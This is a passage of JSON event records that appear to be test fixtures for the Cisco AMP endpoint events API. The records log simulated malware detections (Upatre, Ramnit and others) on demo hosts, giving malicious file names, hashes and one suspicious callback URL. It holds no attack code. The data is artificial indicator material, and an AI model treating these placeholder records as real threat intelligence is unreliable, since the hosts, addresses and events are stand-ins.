Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232643","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":542000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671500","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":526000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671499","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":370000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671498","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":261000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":214000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671496","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663807451562000,"timestamp":1610704833,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663807451561998","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://sovereutilizeignty.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":835000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265345","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":918000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":871000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":824000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704197","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":793000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704196","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":684000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704195","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":704000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594701","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":611000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594700","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707312705798000,"timestamp":1610704830,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:00:30+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1264,"scanned_processes":21,"scanned_paths":0,"malicious_detections":0}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899742001000,"timestamp":1610704828,"timestamp_nanoseconds":742000000,"date":"2021-01-15T10:00:28+00:00","event_type":"Microsoft Word compromise","event_type_id":1107296262,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704828,"start_date":"2021-01-15T10:00:28+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"caee8a2c599ad6e46ffdec5fabadc438af5c2ae5266d2c1e120269fffda6e426"},"parent":{"disposition":"Clean","identity":{"sha256":"b4234acf96fbe0e0feca317a1928afac05105b73556990d89f8a18563e1a3c65"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":589000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180331452157132817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":495000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 
